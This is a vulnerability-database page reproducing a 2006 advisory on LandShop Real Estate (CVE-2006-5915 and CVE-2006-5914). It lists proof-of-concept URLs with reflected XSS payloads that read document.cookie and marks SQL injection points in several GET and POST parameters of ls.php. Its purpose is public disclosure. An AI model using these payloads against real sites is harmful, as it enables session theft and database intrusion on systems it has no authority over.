LandShop Real Estate [multiple injection sql & xss]

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1053103 漏洞类型
发布时间 2006-11-15 更新时间 2006-11-15
CVE编号 CVE-2006-5915
CVE-2006-5914
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2006110067
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
vendor site: http://www.landshop.gr/
product: LandShop Real Estate 
bug: multiple injection sql & xss
risk : high

xss (get) :
http://site.com/PATH/action/ls.php?lang=en&action=list&start=</textarea>
'"><script>alert(document.cookie)</script>
http://site.com/PATH/action/ls.php?lang=en&action=list&start=0&CAT_ID=</
textarea>'"><script>alert(document.cookie)</script>
http://site.com/PATH/action/ls.php?lang=en&action=list&start=0&CAT_ID=1&
keyword=</textarea>'"><script>alert(document.cookie)</script>
http://site.com/PATH/action/ls.php?lang=en&action=list&start=0&CAT_ID=1&
keyword=&search_area=</textarea>'"><script>alert(document.cookie)</scrip
t>
http://site.com/PATH/action/ls.php?lang=en&action=list&start=0&CAT_ID=1&
keyword=&search_area=&search_type=</textarea>'"><script>alert(document.c
ookie)</script>
http://site.com/PATH/action/ls.php?lang=en&action=list&start=0&CAT_ID=1&
keyword=&search_area=&search_type=&infield=</textarea>'"><script>alert(d
ocument.cookie)</script>
http://site.com/PATH/action/ls.php?lang=en&action=list&start=20&CAT_ID=1
&keyword=&search_area=&search_type=&search_order=</textarea>'"><script>a
lert(document.cookie)</script>

injection sql ( get ) :

http://site.com/PATH/action/ls.php?lang=en&action=list&start=[sql]
http://site.com/PATH/action/ls.php?lang=en&action=list&start=0&CAT_ID=1&
keyword=&search_area=[sql]
http://site.com/PATH/action/ls.php?lang=en&action=list&start=0&CAT_ID=1&
keyword=&search_area=&search_type=[sql]
http://site.com/PATH/action/ls.php?lang=en&action=list&start=20&CAT_ID=1
&keyword=&search_area=&search_type=&search_order=[sql]

injection sql ( post ):

http://site.com/PATH/action/ls.php
variables = 
/PATH/action/ls.php?lang=en&action=list&CAT_ID=1&keyword=1&infield=[sql]

http://site.com/PATH/action/ls.php
variables =
/PATH/action/ls.php?lang=en&action=list&CAT_ID=1&keyword=1&infield=all
&search_area=[sql]

laurent gaffi & benjamin moss
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com [email concealed]